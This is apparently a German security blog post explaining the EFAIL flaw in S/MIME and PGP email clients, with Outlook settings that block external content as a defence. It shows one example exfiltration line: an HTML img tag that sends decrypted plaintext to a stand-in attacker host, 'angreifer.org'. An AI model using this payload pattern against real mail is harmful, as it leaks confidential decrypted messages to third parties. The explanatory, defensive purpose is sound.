In den letzten Tagen wurde unter dem Schlagwort „EFAIL“ in den Medien bereits sehr hitzig über eine neu entdeckte Sicherheitslücke bei der E-Mail-Verschlüsselung diskutiert. In diesem Beitrag wollen wir zusammenfassend das Problem erläutern und anhand praktischer Empfehlungen für Outlook zeigen, wie man das Risiko verringern kann, sensible Informationen unbeabsichtigt an Dritte weiterzuleiten.
Das EFAIL-Problem betrifft alle E-Mail-Nutzer – auch wenn gar keine Verschlüsselung zum Einsatz kommt. Das heißt, sowohl unverschlüsselte als auch verschlüsselte E-Mails können auf gleiche Art und Weise manipuliert und mitgelesen werden. Zum jetzigen Zeitpunkt sollte man also generell bei der Auswahl von Informationen, die man über E-Mail teilen möchte, Vorsicht walten lassen. E-Mail ist derzeit also kein sicherer Kommunikationskanal mehr – selbst, wenn man seine Nachrichten verschlüsselt.
Was ist EFAIL?
EFAIL ist eine Sammlung von Sicherheitslücken und Problemen, die die verfügbaren Verschlüsselungsverfahren aushebeln. Die eingesetzten Verschlüsselungsverfahren selbst sind dabei jedoch nicht betroffen. Vielmehr kann eine schlechte Implementierung und unzureichender Schutz vor Manipulation der E-Mail ausgenutzt werden, um an den entschlüsselten Inhalt zu gelangen.
Die E-Mail-Verschlüsselung ist nicht kaputt oder geknackt,
es ist ein Problem der Implementation.
Was läuft schief?
S/MIME und PGP verschlüsseln zwar die Inhalte einer E-Mail, sind aber häufig so mangelhaft in die E-Mail-Clients implementiert, dass das potentielle Risiko besteht, dass Angreifer Nachrichteninhalte einfach umleiten können. Näher betrachtet werden dabei MIME-Nachrichten abgefangen, ihr Inhalt manipuliert und dann erst an den originalen Empfänger weitergeleitet. Wird die Nachricht dann beim Empfänger entschlüsselt, besteht die Gefahr, dass durch das Zusammenspiel des Inhalts mit den manipulierten Teilen der E-Mail der entschlüsselte Inhalt an den Angreifer übermittelt wird.
Zur Erläuterung: MIME steht für Multipurpose Internet Mail Extensions und erlaubt es, eine Nachricht aus verschiedenen Medientypen zusammenzusetzen. Unterstützt werden zum Beispiel Texte, Bilder, Audio, Video und auch HTML Elemente wie Links.
Ein Beispiel
- In einem einfachen Szenario fängt der Angreifer eine E-Mail ab und fügt vor und nach dem verschlüsselten Inhalt HTML-Link Elemente ein. Die Nachricht besteht damit aus drei Teilen.
<img src='http://angreifer.org/? ###Strenggeheime und verschlüsselte Nachricht### '>
- Nachdem die E-Mail beim Empfänger angekommen und der verschlüsselte Teil der Nachricht entschlüsselt wurde, setzt der E-Mail Client die drei Nachrichtenteile automatisch zusammen.
<img src='http://angreifer.org/?Strenggeheime%und%verschluesselte%Nachricht'>
- Damit ist die verschlüsselte Nachricht Bestandteil des Links und wird an den Angreifer übermittelt, sobald dieser Link aktiviert wird. Das kann durch einen Klick auf den Link passieren oder durch das automatische Laden von Inhalten, wenn dies im E-Mail-Client aktiviert wurde.
Das ist nur ein simples Szenario, in dem es um eine einzelne Nachricht geht. Der Angreifer verfügt hier jedoch nicht über die Möglichkeit, die Verschlüsselungs-Mechanik selbst zu korrumpieren. Vielmehr wird das Verhalten des E-Mail-Client nach der Entschlüsselung ausgenutzt. Allerdings gibt es bereits weitere mögliche Ansätze, um beispielsweise Malware oder Ähnliches automatisch nachzuladen.
Wie kann ich mich schützen?
Leider gibt es derzeit keinen ausreichenden Schutz vor Manipulationen an einer E-Mail. Das heißt, der Absender kann sich nicht aktiv schützen – nur der Empfänger kann das Risiko verringern.
Wir empfehlen das Nachladen von Medieninhalten aus externen Quellen zu deaktivieren oder den Einsatz von HTML-Mails einzuschränken, da auf diese Weise keine aktiven Links versehentlich ausgeführt werden können.
In Outlook ist diese Einstellung standardmäßig aktiv, so dass keine externen Inhalte ohne die Genehmigung des Benutzers heruntergeladen werden. Wenn alles korrekt eingestellt ist, sollten empfangene MIME-Mails mit folgender Meldung versehen sein:
Fazit
Mit der EFAIL-Sicherheitslücke ist nicht zu spaßen. Selbst verschlüsselte E-Mails sind aufgrund mangelhafter Implementierung aktueller Verschlüsselungstechnologien gegenwärtig nicht als sicher zu bezeichnen. Die vorgeschlagenen Maßnahmen bekämpfen leider nur die Symptome – nicht das Problem an sich. Es bleibt abzuwarten, ob und wann die Hersteller reagieren und Verschlüsselungsalgorithmen besser in Ihre E-Mail-Clients integrieren.
Quellen und weiterführende Links:
https://www.heise.de/security/artikel/PGP-und-S-MIME-So-funktioniert-Efail-4048873.html
Sicherheitseinstellungen für Office Produkte – sperren externer Inhalte
https://support.office.com/de-de/article/sperren-oder-entsperren-externer-inhalte-in-office-dokumenten-10204ae0-0621-411f-b0d6-575b0847a795
Views: 262